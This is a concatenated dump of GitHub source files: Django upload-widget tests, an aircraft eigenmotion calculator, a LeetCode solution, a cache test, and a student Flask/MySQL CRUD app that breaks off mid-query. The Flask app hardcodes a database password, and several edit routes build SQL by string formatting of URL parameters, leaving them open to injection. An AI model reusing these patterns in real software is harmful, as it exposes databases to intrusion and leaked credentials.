response.context_data['form']\n image_field = form.fields.get('upload_image')\n self.assertIsInstance(image_field.widget, widgets.ResubmitImageWidget)\n\n def test_image_resubmit(self):\n data = {}\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/example/', {'upload_image': fo})\n response = self.OneImageView.as_view()(request)\n form = response.context_data['form']\n self.assertEqual(len(form.errors), 1)\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'upload_image')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/example/', data)\n resubmit_resp = self.OneImageView.as_view()(resubmit_req)\n form = resubmit_resp.context_data['form']\n uploaded_image = form.cleaned_data['upload_image']\n self.assertEqual(uploaded_image.read(), PNG)\n\n\nclass TestModel(models.Model):\n \"\"\"\n I skip the step of saving the model to the database\n \"\"\"\n def save_base(*args, **kwargs):\n pass\n \n class Meta:\n abstract = True\n\n\nclass TestModelAdmin(ModelAdmin):\n \"\"\"\n Instead of returning with a redirect to the change\n list page, I just return the saved object\n \"\"\"\n def response_add(self, request, obj, *args, **kwargs):\n return obj\n\n\nclass TestResubmitAdminWidget(BaseResubmitFileMixin, TestCase):\n class TestFileModel(TestModel):\n admin_name = models.CharField(max_length=100, blank=False)\n admin_upload_file = models.FileField(upload_to=\"fake/\")\n\n class TestImageModel(TestModel):\n admin_name = models.CharField(max_length=100, blank=False)\n admin_upload_image = models.ImageField(upload_to=\"fake/\")\n\n class TestFileAdmin(admin.AdminResubmitMixin, TestModelAdmin):\n pass\n\n class TestImageAdmin(admin.AdminResubmitMixin, TestModelAdmin):\n pass\n\n def setUp(self):\n super(TestResubmitAdminWidget, self).setUp()\n User = get_user_model()\n self.user = User.objects.create_superuser(\n 'TestUser',\n 'testuser@example.com',\n '12345678'\n )\n\n def test_file_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n request = self.factory.get('/admin/example/')\n request.user = self.user\n response = testadmin.add_view(request)\n file_field = response.context_data['adminform'].form.fields.get('admin_upload_file')\n self.assertIsInstance(file_field.widget, admin.AdminResubmitFileWidget)\n\n def test_image_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n request = self.factory.get('/admin/example/')\n request.user = self.user\n response = testadmin.add_view(request)\n image_field = response.context_data['adminform'].form.fields.get('admin_upload_image')\n self.assertIsInstance(image_field.widget, admin.AdminResubmitImageWidget)\n\n def test_image_resubmit_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_image': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_image')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n resubmit_resp = testadmin.add_view(resubmit_req)\n form = resubmit_resp.context_data['adminform'].form\n self.assertEqual(len(form.errors), 1)\n uploaded_image = form.cleaned_data['admin_upload_image']\n self.assertEqual(uploaded_image.read(), PNG)\n\n def test_file_resubmit_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_file': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_file')\n data = {\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n resubmit_resp = testadmin.add_view(resubmit_req)\n form = resubmit_resp.context_data['adminform'].form\n print(\"\\n\".join(str(err) for err in form.errors.items()))\n self.assertEqual(len(form.errors), 1)\n uploaded_file = form.cleaned_data['admin_upload_file']\n self.assertEqual(uploaded_file.read(), self.temporary_content)\n\n def test_image_resubmit_save_admin(self):\n testadmin = self.TestImageAdmin(model=self.TestImageModel, admin_site=AdminSite())\n with open(self.temporary_image.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_image': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_image')\n data = {\n 'admin_name': \"Sample\",\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n setattr(resubmit_req, 'session', 'session')\n messages = FallbackStorage(resubmit_req)\n setattr(resubmit_req, '_messages', messages)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n saved_obj = testadmin.add_view(resubmit_req)\n self.assertEqual(saved_obj.admin_upload_image.read(), PNG)\n\n def test_file_resubmit_save_admin(self):\n testadmin = self.TestFileAdmin(model=self.TestFileModel, admin_site=AdminSite())\n with open(self.temporary_file.name, 'rb') as fo:\n request = self.factory.post('/admin/example/', {'admin_upload_file': fo})\n request.user = self.user\n request._dont_enforce_csrf_checks = True\n response = testadmin.add_view(request)\n form = response.context_data['adminform'].form\n resubmit_field, resubmit_value = self.get_resubmit_field(form, 'admin_upload_file')\n data = {\n 'admin_name': \"Sample\",\n resubmit_field: resubmit_value\n }\n resubmit_req = self.factory.post('/admin/example/', data)\n setattr(resubmit_req, 'session', 'session')\n messages = FallbackStorage(resubmit_req)\n setattr(resubmit_req, '_messages', messages)\n resubmit_req.user = self.user\n resubmit_req._dont_enforce_csrf_checks = True\n saved_obj = testadmin.add_view(resubmit_req)\n self.assertEqual(saved_obj.admin_upload_file.read(), self.temporary_content)\n","repo_name":"un1t/django-file-resubmit","sub_path":"tests/test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"77"} +{"seq_id":"43510867755","text":"from data.Cit_par import *\nfrom src.data_extraction.data_main import Data\nfrom src.data_processing.get_weight import get_weight_at_t\nfrom src.data_processing.aerodynamics import ISA\nfrom src.data_extraction.time_series_tool import TimeSeriesTool\n\nimport cmath\n\n\nclass Eigenmotions:\n def __init__(self, time_spm=0, time_phugoid=0, time_dutch_roll=0, time_aperiodic_roll=0, time_spiral_motion=0):\n if time_spm != 0:\n self.eigenvalue_spm, self.prop_spm = self.__calc_spm(time_spm)\n else:\n self.eigenvalue_spm = \"Time of motion not provided\"\n\n if time_phugoid != 0:\n self.eigenvalue_phugoid, self.prop_phugoid = self.__calc_phugoid(time_phugoid)\n else:\n self.eigenvalue_phugoid = \"Time of motion not provided\"\n\n if time_dutch_roll != 0:\n self.eigenvalue_dutch_roll, self.prop_dutch_roll = self.__calc_dutch_roll(time_dutch_roll)\n else:\n self.eigenvalue_dutch_roll = \"Time of motion not provided\"\n\n if time_aperiodic_roll != 0:\n self.eigenvalue_aperiodic_roll, self.prop_aperiodic_roll = self.__calc_aperiodic_roll(time_aperiodic_roll)\n else:\n self.eigenvalue_aperiodic_roll = \"Time of motion not provided\"\n\n if time_spiral_motion != 0:\n self.eigenvalue_spiral_motion, self.prop_spiral_motion = self.__calc_spiral_motion(time_spiral_motion)\n else:\n self.eigenvalue_spiral_motion = \"Time of motion not provided\"\n\n @staticmethod\n def __get_flight_conditions(t):\n data = Data(r'RefData.mat')\n mat_data = data.get_mat().get_data()\n time = mat_data['time']\n rh_fu = mat_data['rh_engine_FU']\n lh_fu = mat_data['lh_engine_FU']\n\n alt = mat_data['Dadc1_alt']\n\n for idx, t_i in enumerate(time):\n if time[idx] < t <= time[idx+1]:\n break\n\n m = get_weight_at_t(t, time, rh_fu, lh_fu)/9.80665\n\n ts_tool = TimeSeriesTool()\n specific_t_mdat_vals = ts_tool.get_t_specific_mdat_values(t)\n V = specific_t_mdat_vals['Dadc1_tas'][0]\n\n h = alt[idx]\n rho = ISA(h)[2]\n\n mub = m / (rho * S * b)\n muc = m / (rho * S * c)\n\n CL = 2 * m / (rho * V ** 2 * S) # Lift coefficient [ ]\n\n # Cmalpha = -0.5669172330105713\n Cmalpha = -0.6405\n\n return mub, muc, CL, Cmalpha, V\n\n @staticmethod\n def __calc_eigenvalues(u, v, w):\n return (-v+cmath.sqrt(v**2-4*u*w))/(2*u), (-v-cmath.sqrt(v**2-4*u*w))/(2*u)\n\n @staticmethod\n def __calc_eigenvalue_properties(eigenvalue):\n zeta = -eigenvalue.real/cmath.sqrt(eigenvalue.real**2+eigenvalue.imag)\n half_t = cmath.log(1 / 2) / eigenvalue.real\n\n if eigenvalue.imag == 0:\n P = None\n nat_frequency = None\n\n else:\n P = (2*pi)/eigenvalue.imag\n nat_frequency = (2*pi)/P\n\n return {\"zeta\": zeta.real, \"period\": P, \"natural_freq\": nat_frequency, \"half_time\": half_t.real}\n\n # ----------------------------------------------------------------------------------------\n def __calc_spm(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n coef_a = 2*muc*KY2*(2*muc-CZadot)\n coef_b = -2*muc*KY2*CZa-(2*muc+CZq)*Cmadot-(2*muc-CZadot)*Cmq\n coef_c = CZa*Cmq-(2*muc+CZq)*Cma\n\n eigenvalue = list(self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n return eigenvalue*V/c, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_phugoid(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n coef_a = 2*muc*(CZa*Cmq-2*muc*Cma)\n coef_b = 2*muc*(CXu*Cma-Cmu*CXa)+Cmq*(CZu*CXa-CXu*CZa)\n coef_c = CZ0*(Cmu*CZa-Cma*CZu)\n\n eigenvalue = list(self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n return eigenvalue*V/c, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_dutch_roll(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n coef_a = 8*mub**2*KZ2\n coef_b = -2*mub*(Cnr+2*KZ2*CYb)\n coef_c = 4*mub*Cnb+CYb*Cnr\n\n eigenvalue = (self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_aperiodic_roll(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n eigenvalue = (Clp/(4*mub*KX2))[0].astype(complex)\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_spiral_motion(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n eigenvalue = (2*CL*(Clb*Cnr-Cnb*Clr))/(Clp*(CYb*Cnr+4*mub*Cnb)-Cnp*(CYb*Clr+4*mub*Clb))[0].astype(complex)\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n\nif __name__ == \"__main__\":\n # eigenmotions_1 = Eigenmotions(time_spm=2772, time_phugoid=2864, time_dutch_roll=3067, time_aperiodic_roll=3310, time_spiral_motion=3391)\n eigenmotions_1 = Eigenmotions(time_spm=3635, time_phugoid=3237, time_dutch_roll=3717, time_aperiodic_roll=3550, time_spiral_motion=3920)\n\n print(\"-------- Symmetric motions --------\")\n\n print(\"\\nShort Period motion:\", eigenmotions_1.eigenvalue_spm)\n print(eigenmotions_1.prop_spm)\n\n print(\"\\nPhugoid:\", eigenmotions_1.eigenvalue_phugoid)\n print(eigenmotions_1.prop_phugoid)\n\n print(\"\\n-------- Asymmetric motions --------\")\n\n print(\"\\nDutch roll:\", eigenmotions_1.eigenvalue_dutch_roll)\n print(eigenmotions_1.prop_dutch_roll)\n\n print(\"\\nAperiodic roll:\", eigenmotions_1.eigenvalue_aperiodic_roll)\n print(eigenmotions_1.prop_aperiodic_roll)\n\n print(\"\\nSpiral motion:\", eigenmotions_1.eigenvalue_spiral_motion)\n print(eigenmotions_1.prop_spiral_motion)","repo_name":"LukeDeWaal/SVV2019FD","sub_path":"src/data_processing/analyticalmodel/symetrical_eigenmotions.py","file_name":"symetrical_eigenmotions.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27002267773","text":"from collections import defaultdict\nfrom typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n # Time Complexity: O(n)\n # Space Complexity: O(n)\n # We will use a dictionary to store the leaves. We will use dfs to traverse the tree.\n # If the node is None, we will return.\n # If the node is a leaf, we will append the value to the leaves dictionary at the current level.\n # We will then update the max level if the current level is greater than the max level.\n # We will call dfs on the children with the current level + 1.\n # We will return the sum of the leaves at the max level.\n max_level = 1\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n leaves = defaultdict(list)\n def dfs(node, level):\n if not node: \n return\n if not node.left and not node.right:\n leaves[level].append(node.val)\n self.max_level = max(level, self.max_level)\n if node.right: \n dfs(node.right, level + 1)\n if node.left:\n dfs(node.left, level + 1)\n pass\n dfs(root, 1)\n return sum(leaves[self.max_level])","repo_name":"JaredBears/LeetCode","sub_path":"Python-Solutions/DeepestLeavesSum.py","file_name":"DeepestLeavesSum.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27609400697","text":"import time\nfrom typing import Any\n\nfrom thunderstore.cache.cache import cache_function_result\nfrom thunderstore.cache.enums import CacheBustCondition\n\n\ndef test_cache_clear_with_args() -> None:\n @cache_function_result(CacheBustCondition.background_update_only)\n def get_time(cache_vary: Any) -> float:\n return time.time()\n\n first = get_time(\"test\")\n time.sleep(0.01)\n first_cached = get_time(\"test\")\n second = get_time(\"test2\")\n assert first == first_cached\n assert second > first\n time.sleep(0.01)\n get_time.clear_cache_with_args(\"test\")\n first_busted = get_time(\"test\")\n assert first_busted > first\n assert first_busted > second\n","repo_name":"thunderstore-io/Thunderstore","sub_path":"django/thunderstore/cache/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"77"} +{"seq_id":"75079221689","text":"# Project Step 6 (Portfolio Assignment - Group)\n# Juan Pablo Duque and Marco Scandroglio\n# Code Citation:\n# Date: 03/20/2023\n# Code adapted from Exploration 7 Course Content (Flask Starter App):\n# Source URL: https://github.com/osu-cs340-ecampus/flask-starter-app\n\n\nfrom flask import Flask, render_template, json, redirect\nfrom flask_mysqldb import MySQL\nfrom flask import request\nimport os\n\n\napp = Flask(__name__)\n\n# database connection\n# Template:\n# app.config[\"MYSQL_HOST\"] = \"classmysql.engr.oregonstate.edu\"\n# app.config[\"MYSQL_USER\"] = \"cs340_OSUusername\"\n# app.config[\"MYSQL_PASSWORD\"] = \"XXXX\" | last 4 digits of OSU id\n# app.config[\"MYSQL_DB\"] = \"cs340_OSUusername\"\n# app.config[\"MYSQL_CURSORCLASS\"] = \"DictCursor\"\n\n# database connection info\napp.config[\"MYSQL_HOST\"] = \"classmysql.engr.oregonstate.edu\"\napp.config[\"MYSQL_USER\"] = \"cs340_scandrom\"\napp.config[\"MYSQL_PASSWORD\"] = \"5497\"\napp.config[\"MYSQL_DB\"] = \"cs340_scandrom\"\napp.config[\"MYSQL_CURSORCLASS\"] = \"DictCursor\"\n\nmysql = MySQL(app)\n\n# Routes\n# have homepage route to /machines by default for convenience, generally this will be your home route with its own template\n''' ############################################################################################################################\nMACHINES ROUTES\n############################################################################################################################ '''\n\n@app.route(\"/\")\ndef home():\n return redirect(\"/machines\")\n\n\n# route for machines page\n@app.route(\"/machines\", methods=[\"POST\", \"GET\"])\ndef machines():\n # Separate out the request methods, in this case this is for a POST\n # insert a machine into the Machines entity\n if request.method == \"POST\":\n # fire off if user presses the Add Machine button\n if request.form.get(\"Add_Machine\"):\n # grab user form inputs\n year = request.form[\"year\"]\n make = request.form[\"make\"]\n model = request.form[\"model\"]\n serial = request.form[\"serial\"]\n # class is a python reserved word, so it was changed to clas. This has to be modified in the other files!!!!\n clas = request.form[\"class\"]\n\n # This table does no accept null inputs\n # WE HAVE AN ISSUE WITH CLASS (it is an attribute but it is a python reserved word). SHOULD WE CHANGE THIS ATTRIBUTE NAME? MAYBE TO Category?\n query = \"INSERT INTO Machines (year, make, model, serial, class) VALUES (%s, %s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n # Must pay attention when writing clas instead of class!!!\n cur.execute(query, (year, make, model, serial, clas))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/machines\")\n \n # Grab Machines data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT Machines.machineId, Machines.year AS 'Year', Machines.make AS 'Make', Machines.model AS 'Model', Machines.serial AS 'Serial', Machines.class AS 'Class' FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template\n return render_template(\"machines.j2\", data=data)\n\n# route for delete functionality, deleting a machine from Machines,\n# we want to pass the 'id' value of that machine on button click (see HTML) via the route\n@app.route(\"/delete_machines/\")\ndef delete_machines(machineId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Machines WHERE machineId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/machines\")\n\n# route for edit functionality, updating the attributes of a machine in Machines\n# similar to our delete route, we want to the pass the 'id' value of that machine on button click (see HTML) via the route\n@app.route(\"/edit_machines/\", methods=[\"POST\", \"GET\"])\ndef edit_machines(machineId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the machine with our passed id\n query = \"SELECT * FROM Machines WHERE machineId = %s\" % (machineId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machines page passing our query data edit_machines template\n return render_template(\"edit_machines.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Machine' button\n if request.form.get(\"Edit_Machine\"):\n # grab user form inputs\n year = request.form[\"year\"]\n make = request.form[\"make\"]\n model = request.form[\"model\"]\n serial = request.form[\"serial\"]\n # class is a python reserved word, so it was changed to clas. This has to be modified in the other files!!!!\n clas = request.form[\"class\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Machines SET Machines.year = %s, Machines.make = %s, Machines.model = %s, Machines.serial = %s, Machines.class = %s WHERE Machines.machineId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (year, make, model, serial, clas, machineId))\n mysql.connection.commit()\n \n # redirect back to people page after we execute the update query\n return redirect(\"/machines\")\n\n''' ############################################################################################################################\nLOCATIONS ROUTES\n############################################################################################################################ '''\n\n# route for locations page\n@app.route(\"/locations\", methods=[\"POST\", \"GET\"])\ndef locations():\n # Separate out the request methods, in this case this is for a POST\n # insert a location into the Locations entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Location\"):\n # grab user form inputs\n locationName = request.form[\"locationName\"]\n address = request.form[\"address\"]\n zipcode = request.form[\"zipcode\"]\n state = request.form[\"state\"]\n isClientLocation = request.form[\"isClientLocation\"]\n\n # This table does not accept null inputs\n query = \"INSERT INTO Locations (locationName, address, zipcode, state, isClientLocation) VALUES (%s, %s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationName, address, zipcode, state, isClientLocation))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/locations\")\n \n\n # Grab Locations data so we send it to our template to display [IS THIS NECESSARY TO LEAVE IT????]\n if request.method == \"GET\":\n # mySQL query to grab all the locations in Locations\n query = \"SELECT Locations.locationId, Locations.locationName AS 'Location Name', Locations.address AS 'Address', Locations.zipcode AS 'Zipcode', Locations.state AS 'State', Locations.isClientLocation AS 'Client Location' FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"locations.j2\", data=data)\n\n\n# route for delete functionality, deleting a location from Locations,\n# we want to pass the 'id' value of that location on button click (see HTML) via the route\n@app.route(\"/delete_locations/\")\ndef delete_locations(locationId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Locations WHERE locationId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/locations\")\n\n# route for edit functionality, updating the attributes of a location in Locations\n# similar to our delete route, we want to the pass the 'id' value of that location on button click (see HTML) via the route\n@app.route(\"/edit_locations/\", methods=[\"POST\", \"GET\"])\ndef edit_locations(locationId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the person with our passed id\n query = \"SELECT * FROM Locations WHERE locationId = %s;\" % (locationId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_locations page passing our query data edit_locations template\n return render_template(\"edit_locations.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Location' button\n if request.form.get(\"Edit_Location\"):\n # grab user form inputs\n locationName = request.form[\"locationName\"]\n address = request.form[\"address\"]\n zipcode = request.form[\"zipcode\"]\n state = request.form[\"state\"]\n isClientLocation = request.form[\"isClientLocation\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Locations SET Locations.locationName = %s, Locations.address = %s, Locations.zipcode = %s, Locations.state = %s, Locations.isClientLocation = %s WHERE Locations.locationId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationName, address, zipcode, state, isClientLocation, locationId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/locations\")\n\n''' ############################################################################################################################\nPRODUCTS ROUTES\n############################################################################################################################ '''\n\n# route for mechanics page\n@app.route(\"/products\", methods=[\"POST\", \"GET\"])\ndef products():\n # Separate out the request methods, in this case this is for a POST\n # insert a mechanic into the Mechanics entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Product\"):\n # grab user form inputs\n productName = request.form[\"productName\"]\n reference = request.form[\"reference\"]\n brand = request.form[\"brand\"]\n description = request.form[\"description\"]\n\n # This table does no accept null inputs\n query = \"INSERT INTO Products (productName, reference, brand, description) VALUES (%s, %s,%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productName, reference, brand, description))\n mysql.connection.commit()\n\n # redirect back to mechanics page\n return redirect(\"/products\")\n \n\n # Grab Products data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT productId, productName AS 'Product Name', reference AS 'Reference', brand AS 'Brand', description AS 'Description' FROM Products;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"products.j2\", data=data)\n\n\n# route for delete functionality, deleting a product from Products,\n# we want to pass the 'id' value of that product on button click (see HTML) via the route\n@app.route(\"/delete_product/\")\ndef delete_product(productId):\n # mySQL query to delete the product with our passed id\n query = \"DELETE FROM Products WHERE productId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productId,))\n mysql.connection.commit()\n\n # redirect back to products page\n return redirect(\"/products\")\n\n# route for edit functionality, updating the attributes of a product in Products\n# similar to our delete route, we want to the pass the 'id' value of that product on button click (see HTML) via the route\n@app.route(\"/edit_products/\", methods=[\"POST\", \"GET\"])\ndef edit_products(productId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the product with our passed id\n query = \"SELECT * FROM Products WHERE productId = %s;\" % (productId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_products page passing our query data edit_products template\n return render_template(\"edit_products.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Product' button\n if request.form.get(\"Edit_Product\"):\n # grab user form inputs\n productName = request.form[\"productName\"]\n reference = request.form[\"reference\"]\n brand = request.form[\"brand\"]\n description = request.form[\"description\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Products SET Products.productName = %s, Products.reference = %s, Products.brand = %s, Products.description = %s WHERE Products.productId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productName, reference, brand, description, productId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/products\")\n\n\n''' ############################################################################################################################\nMECHANICS ROUTES\n############################################################################################################################ '''\n\n# route for mechanics page\n@app.route(\"/mechanics\", methods=[\"POST\", \"GET\"])\ndef mechanics():\n # Separate out the request methods, in this case this is for a POST\n # insert a mechanic into the Mechanics entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Mechanic\"):\n # grab user form inputs\n firstName = request.form[\"firstName\"]\n lastName = request.form[\"lastName\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n\n # This table does no accept null inputs\n query = \"INSERT INTO Mechanics (firstName, lastName, phone, email) VALUES (%s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (firstName, lastName, phone, email))\n mysql.connection.commit()\n\n # redirect back to mechanics page\n return redirect(\"/mechanics\")\n \n\n # Grab Mechanics data so we send it to our template to display [IS THIS NECESSARY TO LEAVE IT????\n # ]\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT Mechanics.mechanicId, Mechanics.firstName AS 'First Name', Mechanics.lastName AS 'Last Name', Mechanics.phone AS 'Phone Number', Mechanics.email AS 'Email Address' FROM Mechanics;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"mechanics.j2\", data=data)\n\n\n# route for delete functionality, deleting a mechanic from Mechanics,\n# we want to pass the 'id' value of that Mechanic on button click (see HTML) via the route\n@app.route(\"/delete_mechanics/\")\ndef delete_mechanics(mechanicId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Mechanics WHERE mechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (mechanicId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/mechanics\")\n\n# route for edit functionality, updating the attributes of a mechanic in Mechanics\n# similar to our delete route, we want to the pass the 'id' value of that mechanic on button click (see HTML) via the route\n@app.route(\"/edit_mechanics/\", methods=[\"POST\", \"GET\"])\ndef edit_mechanics(mechanicId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the person with our passed id\n query = \"SELECT * FROM Mechanics WHERE mechanicId = %s;\" % (mechanicId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_mechanics page passing our query data edit_mechanics template\n return render_template(\"edit_mechanics.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Location' button\n if request.form.get(\"Edit_Mechanic\"):\n # grab user form inputs\n firstName = request.form[\"firstName\"]\n lastName = request.form[\"lastName\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Mechanics SET Mechanics.firstName = %s, Mechanics.lastName = %s, Mechanics.phone = %s, Mechanics.email = %s WHERE Mechanics.mechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (firstName, lastName, phone, email, mechanicId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/mechanics\")\n \n''' ############################################################################################################################\nWORK ORDER ROUTES\n############################################################################################################################ '''\n\n# route for work orders page\n@app.route(\"/workorders\", methods=[\"POST\", \"GET\"])\ndef workOrders():\n # Separate out the request methods, in this case this is for a POST\n # insert a work order into the WorkOrders entity\n if request.method == \"POST\":\n # fire off if user presses the Add Person button\n if request.form.get(\"Add_Work_Order\"):\n # grab user form inputs\n machineId = request.form[\"serial\"]\n locationId = request.form[\"locationId\"]\n date = request.form[\"date\"]\n description = request.form[\"description\"]\n\n # account for null locationId\n if locationId == \"0\":\n # mySQL query to insert a new work order into WorkOrders with our form inputs\n # query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s)\" \n query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES (%s, %s, %s)\" \n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, date, description))\n mysql.connection.commit()\n\n # no null inputs\n else:\n # query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s, %s)\"\n query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES (%s, %s, %s, %s)\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, locationId, date, description))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n # Grab workOrders data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the work orders in workOrders\n query = (\"SELECT WorkOrders.workOrderId, \" \n \"Machines.model AS 'Machine Model', Machines.serial AS 'Machine Serial', Locations.locationName AS 'Location Name', WorkOrders.date AS 'Date', WorkOrders.description AS 'Description'\"\n \"FROM 